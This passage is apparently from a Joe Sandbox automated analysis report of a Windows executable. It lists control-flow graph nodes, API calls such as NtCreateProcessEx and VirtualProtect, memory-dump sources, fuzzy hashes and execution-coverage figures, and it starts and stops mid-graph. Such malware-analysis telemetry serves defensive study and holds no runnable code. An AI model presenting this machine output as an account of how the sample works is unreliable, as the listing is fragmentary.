API calls 3665->3666 3667 7ff759bf153f 3666->3667 3668 7ff759bf1394 2 API calls 3667->3668 3669 7ff759bf154e 3668->3669 3670 7ff759bf1394 2 API calls 3669->3670 3671 7ff759bf155d 3670->3671 3672 7ff759bf1394 2 API calls 3671->3672 3673 7ff759bf156c 3672->3673 3674 7ff759bf1394 2 API calls 3673->3674 3675 7ff759bf157b 3674->3675 3676 7ff759bf1394 2 API calls 3675->3676 3677 7ff759bf158a 3676->3677 3678 7ff759bf1394 2 API calls 3677->3678 3679 7ff759bf1599 3678->3679 3680 7ff759bf1394 2 API calls 3679->3680 3681 7ff759bf15a8 3680->3681 3682 7ff759bf1394 2 API calls 3681->3682 3683 7ff759bf15b7 3682->3683 3684 7ff759bf1394 2 API calls 3683->3684 3685 7ff759bf15c6 
3684->3685 3686 7ff759bf1394 2 API calls 3685->3686 3687 7ff759bf15d5 3686->3687 3688 7ff759bf15e4 3687->3688 3689 7ff759bf1394 2 API calls 3687->3689 3690 7ff759bf1394 2 API calls 3688->3690 3689->3688 3691 7ff759bf15f3 3690->3691 3691->3257 3692 7ff759bf149a 3691->3692 3693 7ff759bf1394 2 API calls 3692->3693 3694 7ff759bf14a9 3693->3694 3695 7ff759bf1394 2 API calls 3694->3695 3696 7ff759bf14b8 3695->3696 3697 7ff759bf1394 2 API calls 3696->3697 3698 7ff759bf14c7 3697->3698 3699 7ff759bf1394 2 API calls 3698->3699 3700 7ff759bf14d6 3699->3700 3701 7ff759bf14e5 3700->3701 3702 7ff759bf1394 2 API calls 3700->3702 3703 7ff759bf1394 2 API calls 3701->3703 3702->3701 3704 7ff759bf14ef 3703->3704 3705 7ff759bf14f4 3704->3705 3706 7ff759bf1394 2 API calls 3704->3706 3707 7ff759bf1394 2 API calls 3705->3707 3706->3705 3708 7ff759bf14fe 3707->3708 3709 7ff759bf1503 3708->3709 3710 7ff759bf1394 2 API calls 3708->3710 3711 7ff759bf1394 2 API calls 3709->3711 3710->3709 3712 7ff759bf150d 3711->3712 3713 7ff759bf1394 2 API calls 3712->3713 3714 7ff759bf1512 3713->3714 3715 7ff759bf1394 2 API calls 3714->3715 3716 7ff759bf1521 3715->3716 3717 7ff759bf1394 2 API calls 3716->3717 3718 7ff759bf1530 3717->3718 3719 7ff759bf1394 2 API calls 3718->3719 3720 7ff759bf153f 3719->3720 3721 7ff759bf1394 2 API calls 3720->3721 3722 7ff759bf154e 3721->3722 3723 7ff759bf1394 2 API calls 3722->3723 3724 7ff759bf155d 3723->3724 3725 7ff759bf1394 2 API calls 3724->3725 3726 7ff759bf156c 3725->3726 3727 7ff759bf1394 2 API calls 3726->3727 3728 7ff759bf157b 3727->3728 3729 7ff759bf1394 2 API calls 3728->3729 3730 7ff759bf158a 3729->3730 3731 7ff759bf1394 2 API calls 3730->3731 3732 7ff759bf1599 3731->3732 3733 7ff759bf1394 2 API calls 3732->3733 3734 7ff759bf15a8 3733->3734 3735 7ff759bf1394 2 API calls 3734->3735 3736 7ff759bf15b7 3735->3736 3737 7ff759bf1394 2 API calls 3736->3737 3738 7ff759bf15c6 3737->3738 3739 7ff759bf1394 2 API calls 3738->3739 3740 7ff759bf15d5 3739->3740 3741 
7ff759bf15e4 3740->3741 3742 7ff759bf1394 2 API calls 3740->3742 3743 7ff759bf1394 2 API calls 3741->3743 3742->3741 3744 7ff759bf15f3 3743->3744 3744->3257 3744->3268 3746 7ff759bf1394 2 API calls 3745->3746 3747 7ff759bf148b 3746->3747 3748 7ff759bf1394 2 API calls 3747->3748 3749 7ff759bf149a 3748->3749 3750 7ff759bf1394 2 API calls 3749->3750 3751 7ff759bf14a9 3750->3751 3752 7ff759bf1394 2 API calls 3751->3752 3753 7ff759bf14b8 3752->3753 3754 7ff759bf1394 2 API calls 3753->3754 3755 7ff759bf14c7 3754->3755 3756 7ff759bf1394 2 API calls 3755->3756 3757 7ff759bf14d6 3756->3757 3758 7ff759bf14e5 3757->3758 3759 7ff759bf1394 2 API calls 3757->3759 3760 7ff759bf1394 2 API calls 3758->3760 3759->3758 3761 7ff759bf14ef 3760->3761 3762 7ff759bf14f4 3761->3762 3763 7ff759bf1394 2 API calls 3761->3763 3764 7ff759bf1394 2 API calls 3762->3764 3763->3762 3765 7ff759bf14fe 3764->3765 3766 7ff759bf1503 3765->3766 3767 7ff759bf1394 2 API calls 3765->3767 3768 7ff759bf1394 2 API calls 3766->3768 3767->3766 3769 7ff759bf150d 3768->3769 3770 7ff759bf1394 2 API calls 3769->3770 3771 7ff759bf1512 3770->3771 3772 7ff759bf1394 2 API calls 3771->3772 3773 7ff759bf1521 3772->3773 3774 7ff759bf1394 2 API calls 3773->3774 3775 7ff759bf1530 3774->3775 3776 7ff759bf1394 2 API calls 3775->3776 3777 7ff759bf153f 3776->3777 3778 7ff759bf1394 2 API calls 3777->3778 3779 7ff759bf154e 3778->3779 3780 7ff759bf1394 2 API calls 3779->3780 3781 7ff759bf155d 3780->3781 3782 7ff759bf1394 2 API calls 3781->3782 3783 7ff759bf156c 3782->3783 3784 7ff759bf1394 2 API calls 3783->3784 3785 7ff759bf157b 3784->3785 3786 7ff759bf1394 2 API calls 3785->3786 3787 7ff759bf158a 3786->3787 3788 7ff759bf1394 2 API calls 3787->3788 3789 7ff759bf1599 3788->3789 3790 7ff759bf1394 2 API calls 3789->3790 3791 7ff759bf15a8 3790->3791 3792 7ff759bf1394 2 API calls 3791->3792 3793 7ff759bf15b7 3792->3793 3794 7ff759bf1394 2 API calls 3793->3794 3795 7ff759bf15c6 3794->3795 3796 7ff759bf1394 2 API calls 3795->3796 3797 
7ff759bf15d5 3796->3797 3798 7ff759bf15e4 3797->3798 3799 7ff759bf1394 2 API calls 3797->3799 3800 7ff759bf1394 2 API calls 3798->3800 3799->3798 3801 7ff759bf15f3 3800->3801 3801->3273 3803 7ff759bf1394 2 API calls 3802->3803 3804 7ff759bf15d5 3803->3804 3805 7ff759bf15e4 3804->3805 3806 7ff759bf1394 2 API calls 3804->3806 3807 7ff759bf1394 2 API calls 3805->3807 3806->3805 3808 7ff759bf15f3 3807->3808 3808->3254 3838 7ff759bf1000 3839 7ff759bf108b __set_app_type 3838->3839 3840 7ff759bf1040 3838->3840 3842 7ff759bf10b6 3839->3842 3840->3839 3841 7ff759bf10e5 3842->3841 3844 7ff759bf1e00 3842->3844 3845 7ff759bf8980 __setusermatherr 3844->3845 3846 7ff759bf1800 3847 7ff759bf1812 3846->3847 3848 7ff759bf1835 fprintf 3847->3848 3858 7ff759bf2320 strlen 3859 7ff759bf2337 3858->3859 3860 7ff759bf219e 3861 7ff759bf2272 3860->3861 3862 7ff759bf21ab EnterCriticalSection 3860->3862 3863 7ff759bf2265 LeaveCriticalSection 3862->3863 3865 7ff759bf21c8 3862->3865 3863->3861 3864 7ff759bf21e9 TlsGetValue GetLastError 3864->3865 3865->3863 3865->3864 3866 7ff759bf1ab3 3867 7ff759bf199e 3866->3867 3867->3866 3868 7ff759bf1b36 3867->3868 3870 7ff759bf1a0f 3867->3870 3871 7ff759bf19e9 VirtualProtect 3867->3871 3869 7ff759bf1ba0 4 API calls 3868->3869 3869->3870 3871->3867 2478 7ff759bf1394 2482 7ff759bf83f0 2478->2482 2480 7ff759bf13b8 2481 7ff759bf13c6 NtCreateProcessEx 2480->2481 2483 7ff759bf840e 2482->2483 2486 7ff759bf843b 2482->2486 2483->2480 2484 7ff759bf84e3 2485 7ff759bf84ff malloc 2484->2485 2487 7ff759bf8520 2485->2487 2486->2483 2486->2484 2487->2483 3820 7ff759bf216f 3821 7ff759bf2178 InitializeCriticalSection 3820->3821 3822 7ff759bf2185 3820->3822 3821->3822 3823 7ff759bf1a70 3824 7ff759bf199e 3823->3824 3824->3823 3825 7ff759bf1a0f 3824->3825 3826 7ff759bf19e9 VirtualProtect 3824->3826 3827 7ff759bf1b36 3824->3827 3826->3823 3826->3824 3828 7ff759bf1ba0 4 API calls 3827->3828 3828->3825 3849 7ff759bf1e10 3850 7ff759bf1e2f 3849->3850 3851 7ff759bf1e55 3850->3851 
3852 7ff759bf1ecc 3850->3852 3853 7ff759bf1eb5 3850->3853 3851->3853 3857 7ff759bf1f12 signal 3851->3857 3852->3853 3854 7ff759bf1ed3 signal 3852->3854 3854->3853 3855 7ff759bf1ee4 3854->3855 3855->3853 3856 7ff759bf1eea signal 3855->3856 3856->3853 3857->3853 3884 7ff759bf1fd0 3885 7ff759bf1fe4 3884->3885 3886 7ff759bf2033 3884->3886 3885->3886 3887 7ff759bf1ffd EnterCriticalSection LeaveCriticalSection 3885->3887 3887->3886 3888 7ff759bf2050 3889 7ff759bf20cf 3888->3889 3890 7ff759bf205e EnterCriticalSection 3888->3890 3891 7ff759bf20c2 LeaveCriticalSection 3890->3891 3892 7ff759bf2079 3890->3892 3891->3889 3892->3891 3893 7ff759bf20bd free 3892->3893 3893->3891 3894 7ff759bf1f47 3895 7ff759bf1e99 3894->3895 3896 7ff759bf1e67 signal 3894->3896 3896->3895 3897 7ff759bf1e7c 3896->3897 3897->3895 3898 7ff759bf1e82 signal 3897->3898 3898->3895

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
• Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
Similarity
• API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
• String ID:
• API String ID: 2643109117-0
• Opcode ID: ef29aa538128acd76b923304bcce7985f3f41b3f1f1ed9bc751512ae57c1cafe
• Instruction ID: b5aaab7eab15ccc099b22452c37fe8e8d511a761a5b8762437cfec510680e2f7
• Opcode Fuzzy Hash: ef29aa538128acd76b923304bcce7985f3f41b3f1f1ed9bc751512ae57c1cafe
• Instruction Fuzzy Hash: A2510B22E1964A85FA10BF65EA90379A7B1AF44B90FCC5435C94D473A1FF2CE486C721

Control-flow Graph

APIs
• NtCreateProcessEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF759BF1156), ref: 00007FF759BF13F7
Memory Dump Source
• Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
• Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 44d218f324a4a60e69f590186adc03f2af2ae93ee84cdde52191a9f821aa7650
• Instruction ID: f1c61f84f2d275c6989de90c26a1c03f5566b04f94209f0f299be8b0ea98bb22
• Opcode Fuzzy Hash: 44d218f324a4a60e69f590186adc03f2af2ae93ee84cdde52191a9f821aa7650
• Instruction Fuzzy Hash: BDF0FF7290CB5AC2FA14EF66F85002AB774FB88B80F444435E99D43725EF3CE0518B64

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID: memset$wcscatwcscpywcslen
                                                        • String ID: $0$0$@$@
                                                        • API String ID: 4263182637-1413854666
                                                        • Opcode ID: 4d512575b54fdde5b2efe29d73fe70a91ca72ef17a151f0fc642e1fa6fb95c69
                                                        • Instruction ID: e2e6fa6153b7e95532df4247ed27cab09ec2d94ad30a30a9210771fea9b55dc2
                                                        • Opcode Fuzzy Hash: 4d512575b54fdde5b2efe29d73fe70a91ca72ef17a151f0fc642e1fa6fb95c69
                                                        • Instruction Fuzzy Hash: DFB1A12290CAD585F721AF24E4453BAF7B0FF84384F885235EA8942B95EF7DD186CB11

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                        • String ID: 0$X$`
                                                        • API String ID: 329590056-2527496196
                                                        • Opcode ID: 7b2a33b9fae322ee24d76996efd72da4f7d36b3ec6a72cb06d8734951d1eeac8
                                                        • Instruction ID: 8c90afaa81d04bea51fe0cb295af62d96c6470b985ee916a09ac9b14805c96d8
                                                        • Opcode Fuzzy Hash: 7b2a33b9fae322ee24d76996efd72da4f7d36b3ec6a72cb06d8734951d1eeac8
                                                        • Instruction Fuzzy Hash: 97026C22918BC585F720AF15E8443AAB7B0FB857A4F884235DA9C47BE5EF3CD185CB11

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,00007FF759BFA4B4,00007FF759BFA4B4,?,?,00007FF759BF0000,?,00007FF759BF1991), ref: 00007FF759BF1C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,00007FF759BFA4B4,00007FF759BFA4B4,?,?,00007FF759BF0000,?,00007FF759BF1991), ref: 00007FF759BF1CC7
                                                        • memcpy.MSVCRT ref: 00007FF759BF1CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,00007FF759BFA4B4,00007FF759BFA4B4,?,?,00007FF759BF0000,?,00007FF759BF1991), ref: 00007FF759BF1D23
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: 0deee9cd0ba2319482cc86d0a3ef914e3088b52e5e70b18c8ce3c0687bb0a018
                                                        • Instruction ID: ce74b520d3dcc67d2d750f7b0e8fbf6e1670659225c1be389879850509304638
                                                        • Opcode Fuzzy Hash: 0deee9cd0ba2319482cc86d0a3ef914e3088b52e5e70b18c8ce3c0687bb0a018
                                                        • Instruction Fuzzy Hash: 07418FA1A0964B81FA54AF45D9846B8A7B0FB44BC0F9D4932CE0D47795EF3CE547CB20

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                        • String ID:
                                                        • API String ID: 3326252324-0
                                                        • Opcode ID: 6202ad9642b61ede5142cafd6873fb990c29b47e697254827fe3e53e840c4266
                                                        • Instruction ID: 67fb6dc28b720eae9cb0b00335a2b7fe110fb163831c1dfcff415431b0bbcc6b
                                                        • Opcode Fuzzy Hash: 6202ad9642b61ede5142cafd6873fb990c29b47e697254827fe3e53e840c4266
                                                        • Instruction Fuzzy Hash: FF21A922E1995A81FE69BF51E994275A270BF55B90FCC4031C90E47BA4EF2CF947C321

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: 427cd3d36267b3fa69e89bab234189796d32b27608e303035859b8d0eeaeffb8
                                                        • Instruction ID: 5e1da40a040844f0ce2789aa592b79012d0295bb7d687ff60ccee3cd48902f25
                                                        • Opcode Fuzzy Hash: 427cd3d36267b3fa69e89bab234189796d32b27608e303035859b8d0eeaeffb8
                                                        • Instruction Fuzzy Hash: 1F218E22E0914E42FA757E14968037992B19F84764FAD8971DA1E433D4FF2DF8C38AA1

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF759BF1247), ref: 00007FF759BF19F9
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: 980c9c0f67357cad808cfc73b9f707eed9ad7f9cf4014a5acad94c34b8aa7a4b
                                                        • Instruction ID: 217e40336425254dfbde39a568059f28e7931dc6d617242ed43c8e50271efd3b
                                                        • Opcode Fuzzy Hash: 980c9c0f67357cad808cfc73b9f707eed9ad7f9cf4014a5acad94c34b8aa7a4b
                                                        • Instruction Fuzzy Hash: 5D515D22E0854AD6FB54AF25D9447B4A771EB14B94F8C8531D92C077A4EF3CE487CB20

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: 63103e160961b71847a4263c697666ec41891c327a8e8c0011d2add9cd08cfe4
                                                        • Instruction ID: 37b330f5db8612dfb0575305ea8240e10bf2b4fae6ed9a1a3c0a532c1e414303
                                                        • Opcode Fuzzy Hash: 63103e160961b71847a4263c697666ec41891c327a8e8c0011d2add9cd08cfe4
                                                        • Instruction Fuzzy Hash: 71F0C212E08A8982F620BF24AA410B9E371EB597C0F849231DE4E53651FF2CF283C310

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: 3592c698fd96db414e18d9b1a955536c8f084f27075795ee67145d81e77bf88e
                                                        • Instruction ID: acafd71518a3c1e8a0ba5fd0faa31606621c5fe6154fbfcb3b66b88fd68fcc56
                                                        • Opcode Fuzzy Hash: 3592c698fd96db414e18d9b1a955536c8f084f27075795ee67145d81e77bf88e
                                                        • Instruction Fuzzy Hash: C1018826A09A5681FE5AAF51E944274A270AF54B91FCC4031CA0D53B94FF3CF997C325

                                                        Execution Graph

                                                        Execution Coverage:2.4%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:853
                                                        Total number of Limit Nodes:2
2 API calls 2397->2398 2399 1400015f3 2398->2399 2399->2194 2401 140001394 2 API calls 2400->2401 2402 14000147c 2401->2402 2403 140001394 2 API calls 2402->2403 2404 14000148b 2403->2404 2405 140001394 2 API calls 2404->2405 2406 14000149a 2405->2406 2407 140001394 2 API calls 2406->2407 2408 1400014a9 2407->2408 2409 140001394 2 API calls 2408->2409 2410 1400014b8 2409->2410 2411 140001394 2 API calls 2410->2411 2412 1400014c7 2411->2412 2413 140001394 2 API calls 2412->2413 2414 1400014d6 2413->2414 2415 1400014e5 2414->2415 2416 140001394 2 API calls 2414->2416 2417 140001394 2 API calls 2415->2417 2416->2415 2418 1400014ef 2417->2418 2419 1400014f4 2418->2419 2420 140001394 2 API calls 2418->2420 2421 140001394 2 API calls 2419->2421 2420->2419 2422 1400014fe 2421->2422 2423 140001503 2422->2423 2424 140001394 2 API calls 2422->2424 2425 140001394 2 API calls 2423->2425 2424->2423 2426 14000150d 2425->2426 2427 140001394 2 API calls 2426->2427 2428 140001512 2427->2428 2429 140001394 2 API calls 2428->2429 2430 140001521 2429->2430 2431 140001394 2 API calls 2430->2431 2432 140001530 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000153f 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000154e 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000155d 2437->2438 2439 140001394 2 API calls 2438->2439 2440 14000156c 2439->2440 2441 140001394 2 API calls 2440->2441 2442 14000157b 2441->2442 2443 140001394 2 API calls 2442->2443 2444 14000158a 2443->2444 2445 140001394 2 API calls 2444->2445 2446 140001599 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015a8 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015b7 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015c6 2451->2452 2453 140001394 2 API calls 2452->2453 2454 1400015d5 2453->2454 2455 140001394 2 API calls 2454->2455 2456 1400015e4 2455->2456 2457 140001394 2 API calls 2456->2457 2458 1400015f3 2457->2458 2458->2231 2459 140001530 2458->2459 2460 
140001394 2 API calls 2459->2460 2461 14000153f 2460->2461 2462 140001394 2 API calls 2461->2462 2463 14000154e 2462->2463 2464 140001394 2 API calls 2463->2464 2465 14000155d 2464->2465 2466 140001394 2 API calls 2465->2466 2467 14000156c 2466->2467 2468 140001394 2 API calls 2467->2468 2469 14000157b 2468->2469 2470 140001394 2 API calls 2469->2470 2471 14000158a 2470->2471 2472 140001394 2 API calls 2471->2472 2473 140001599 2472->2473 2474 140001394 2 API calls 2473->2474 2475 1400015a8 2474->2475 2476 140001394 2 API calls 2475->2476 2477 1400015b7 2476->2477 2478 140001394 2 API calls 2477->2478 2479 1400015c6 2478->2479 2480 140001394 2 API calls 2479->2480 2481 1400015d5 2480->2481 2482 140001394 2 API calls 2481->2482 2483 1400015e4 2482->2483 2484 140001394 2 API calls 2483->2484 2485 1400015f3 2484->2485 2485->2222 2485->2223 2487 140001394 2 API calls 2486->2487 2488 1400014b8 2487->2488 2489 140001394 2 API calls 2488->2489 2490 1400014c7 2489->2490 2491 140001394 2 API calls 2490->2491 2492 1400014d6 2491->2492 2493 1400014e5 2492->2493 2494 140001394 2 API calls 2492->2494 2495 140001394 2 API calls 2493->2495 2494->2493 2496 1400014ef 2495->2496 2497 1400014f4 2496->2497 2498 140001394 2 API calls 2496->2498 2499 140001394 2 API calls 2497->2499 2498->2497 2500 1400014fe 2499->2500 2501 140001503 2500->2501 2502 140001394 2 API calls 2500->2502 2503 140001394 2 API calls 2501->2503 2502->2501 2504 14000150d 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001512 2505->2506 2507 140001394 2 API calls 2506->2507 2508 140001521 2507->2508 2509 140001394 2 API calls 2508->2509 2510 140001530 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000153f 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000154e 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000155d 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000156c 2517->2518 2519 140001394 2 API calls 2518->2519 2520 14000157b 2519->2520 2521 140001394 2 API calls 
2520->2521 2522 14000158a 2521->2522 2523 140001394 2 API calls 2522->2523 2524 140001599 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015a8 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015b7 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015c6 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015d5 2531->2532 2533 140001394 2 API calls 2532->2533 2534 1400015e4 2533->2534 2535 140001394 2 API calls 2534->2535 2536 1400015f3 2535->2536 2536->2227 2537 140001440 2536->2537 2538 140001394 2 API calls 2537->2538 2539 14000144f 2538->2539 2540 140001394 2 API calls 2539->2540 2541 14000145e 2540->2541 2542 140001394 2 API calls 2541->2542 2543 14000146d 2542->2543 2544 140001394 2 API calls 2543->2544 2545 14000147c 2544->2545 2546 140001394 2 API calls 2545->2546 2547 14000148b 2546->2547 2548 140001394 2 API calls 2547->2548 2549 14000149a 2548->2549 2550 140001394 2 API calls 2549->2550 2551 1400014a9 2550->2551 2552 140001394 2 API calls 2551->2552 2553 1400014b8 2552->2553 2554 140001394 2 API calls 2553->2554 2555 1400014c7 2554->2555 2556 140001394 2 API calls 2555->2556 2557 1400014d6 2556->2557 2558 1400014e5 2557->2558 2559 140001394 2 API calls 2557->2559 2560 140001394 2 API calls 2558->2560 2559->2558 2561 1400014ef 2560->2561 2562 1400014f4 2561->2562 2563 140001394 2 API calls 2561->2563 2564 140001394 2 API calls 2562->2564 2563->2562 2565 1400014fe 2564->2565 2566 140001503 2565->2566 2567 140001394 2 API calls 2565->2567 2568 140001394 2 API calls 2566->2568 2567->2566 2569 14000150d 2568->2569 2570 140001394 2 API calls 2569->2570 2571 140001512 2570->2571 2572 140001394 2 API calls 